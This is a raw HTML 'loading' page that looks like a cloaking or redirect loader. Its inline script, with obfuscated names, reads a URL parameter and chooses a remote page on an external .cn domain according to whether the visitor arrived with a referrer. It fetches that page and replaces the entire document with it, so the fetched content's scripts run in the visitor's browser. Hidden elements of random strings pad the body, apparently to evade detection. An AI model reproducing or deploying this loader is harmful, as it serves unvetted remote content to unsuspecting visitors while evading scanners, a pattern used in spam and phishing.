<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .rdXjis3H {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .rdXjis3H .bB5dUg2g {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .rdXjis3H .content {
            line-height: 50px;
            text-align: center
        }

        .rdXjis3H .img {
            width: 100%
        }

        .rdXjis3H .JGWycw2d1c {
            text-align: center
        }

        .rdXjis3H .JGWycw2d1c span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .rdXjis3H .JGWycw2d1c span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .rdXjis3H .JGWycw2d1c span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .rdXjis3H .JGWycw2d1c span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .rdXjis3H .JGWycw2d1c span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .rdXjis3H .JGWycw2d1c span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .rdXjis3H .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CxcXK8Fh2goWK(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var mOU1yTM = CxcXK8Fh2goWK('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ mOU1yTM +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ mOU1yTM +".html?a=share";
		}
		
        rVh8BDEx=url+"#"+new Date().getTime();
        rVh8BDEx && function() {
            $.get(rVh8BDEx, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>CjB1o1Wn6LGBtZyKBt3cbhU5T08oq6d5t93IFXz3jn6Jjt17ZIdsGVq3KCFM2AHsWYuBi9trwIbkSUVw5yZxnXHCfNqe2fN</div>
<li style='display:none' >lvZC57bh80QyH528fkD1Tx9Rr7lqq8XgcP</li>
<b style='display:none' >YmDeixEJuhetWpEAcC2Vo45IfWuNU5XNZWQFZDKDDDMU8iBvxnzHguCFhmqdwZvuC89J12Yszn</b>
<h1 style='display:none' >CbqS2g5jF0SxAuxIQJrmLfWUHtk2nnYKWXtuntItGqA7qKbdAUa1IwR2q05</h1><div class="rdXjis3H">
    <div class="bB5dUg2g">
        <div class="JGWycw2d1c">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>N4CWM1l4iyKdddEd2zyKe4WUNr1PGI</span>
<b style='display:none' >Zj28GVjtQFOn1M2nZHvEVQheWj589OeUudW67mB2jcd4oWfoDA7cFlEu563zKlEzc9iCS2kIJ0vqqJbbic</b>
<div style='display:none'>KzIMx0pcwvUL4897</div>
<span style='display:none'>N4CWM1l4iyKdddEd2zyKe4WUNr1PGI</span>
<img  src='' style='display:none'>
<span style='display:none'>N4CWM1l4iyKdddEd2zyKe4WUNr1PGI</span>
<h1 style='display:none' >BpF0XRo5xUuhaQlOQB3kq91jfvsmC0vlUM</h1>
<div style='display:none'>KzIMx0pcwvUL4897</div></body>
</html>